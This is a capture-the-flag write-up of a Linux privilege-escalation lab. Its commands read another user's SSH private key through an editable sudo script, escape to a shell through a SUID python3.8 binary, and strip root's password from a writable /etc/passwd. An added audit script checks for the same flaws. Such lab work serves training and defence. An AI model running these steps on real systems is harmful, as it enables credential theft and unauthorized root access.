AUCHALL - [Privesc] - Chain


Challenge Description

It's time you learnt about horizontal and vertical privesc. Use cy243l:cy243l as your creds.

Solution

Let's start with SSH:

ssh [email protected] -p PORT

Password: cy243l


On decoding the base64 output, we got database credentials.

nadeem.sh

#!/bin/bash
 
echo "I am `whoami`. But I am really Ashfaq Nadeem."

I replaced whoami in the script with cat /home/nadeem/.ssh/id_rsa.

nadeem.sh after modification

#!/bin/bash
 
echo "I am `cat /home/nadeem/.ssh/id_rsa`. But I am really Ashfaq Nadeem."

Now run the script as the nadeem user with the following command:

sudo -u nadeem /opt/nadeem.sh

This prints the id_rsa (SSH private key) of the nadeem user.


Now save it on your local machine as id_rsa1 in a separate folder.

Change the permissions of id_rsa1:

$ chmod 600 id_rsa1

Get a shell as the nadeem user by executing the following command:

ssh -i id_rsa1 [email protected] -p PORT

Now check for SUID binaries:

find / -perm /4000 2>/dev/null -exec ls -l {} \;


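bajwa is the owner of the file (user).
nadeem is the group owner of the file.

Because the SUID bit is set in the owner's permission field (-rwsr-s---), the binary is executed with the effective user ID of the file owner (bajwa in this case) instead of that of the user in group nadeem who ran the command. Using it to exec bash with -p, which stops bash from resetting the effective UID to the real UID, gives a shell as bajwa: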

/usr/bin/python3.8 -c 'import os; os.execl("/bin/bash", "bash", "-p")'


Now save bajwa's private key as id_rsa2 on your local machine.


Change the permissions of this file:

chmod 600 id_rsa2

Get a shell as the bajwa user by executing the following command:

ssh -i id_rsa2 [email protected] -p PORT

Now we can write to /etc/passwd as the bajwa user.

Simply change

root:x:0:0:root:/root:/bin/bash

to

root::0:0:root:/root:/bin/bash

The x in the original root entry indicates that the password hash is stored in the /etc/shadow file. Removing it leaves the password field empty, which means no password is set for the user.

Final /etc/passwd

Get root by executing the following command:

su -

or su root
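
An added audit sketch, not part of the original write-up, that checks a host for the three weaknesses chained above: a sudo-allowed script that a non-root user can modify, a SUID interpreter, and a passwd file that is writable by non-root users or contains an empty password field. The function names and the interpreter name list are assumptions chosen for illustration, and it relies on GNU find.

```shell
#!/bin/sh
# Added audit sketch (not from the challenge): flags the three weaknesses
# chained above. Function names are illustrative; needs GNU find.

# Accounts whose password field in a passwd-format file is empty,
# e.g. "root::0:0:root:/root:/bin/bash".
empty_password_accounts() {        # $1 = passwd-format file
    awk -F: 'NF > 1 && $2 == "" { print $1 }' "$1"
}

# True if $1 is owned by a non-root uid or has group/other write bits,
# i.e. someone other than root can change its contents.
writable_by_non_root() {           # $1 = file path
    [ -n "$(find "$1" -maxdepth 0 \( ! -uid 0 -o -perm /022 \) 2>/dev/null)" ]
}

# SUID files under $1 that are interpreters or shells (python3.8 here).
suid_interpreters() {              # $1 = directory to scan
    find "$1" -xdev -type f -perm -4000 \
        \( -name 'python*' -o -name 'perl*' -o -name 'ruby*' \
           -o -name 'bash' -o -name 'dash' -o -name 'sh' \) 2>/dev/null
}

# Print one line per finding; return 1 if anything was found.
audit() {      # $1 = passwd file, $2 = scan dir, $3... = sudo-allowed scripts
    passwd_file=$1; scan_dir=$2; shift 2
    findings=$(
        empty_password_accounts "$passwd_file" | sed 's/^/EMPTY-PASSWORD account: /'
        writable_by_non_root "$passwd_file" &&
            echo "NON-ROOT-WRITABLE passwd file: $passwd_file"
        suid_interpreters "$scan_dir" | sed 's/^/SUID interpreter: /'
        for f in "$@"; do
            writable_by_non_root "$f" && echo "NON-ROOT-WRITABLE sudo target: $f"
        done
        :
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Usage: sh audit.sh /etc/passwd / /opt/nadeem.sh
if [ "$#" -ge 2 ]; then audit "$@"; fi
```

The writability check looks only at ownership and mode bits; ACLs and writable parent directories need a separate review.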


Flag

Flag is dynamic

CY243L{h0r1z0nt4l_4nd_v3r71c4l_pr1veSc_2A398ea_UXSS_iNkX}

Writeups 2023 © RootxRAN.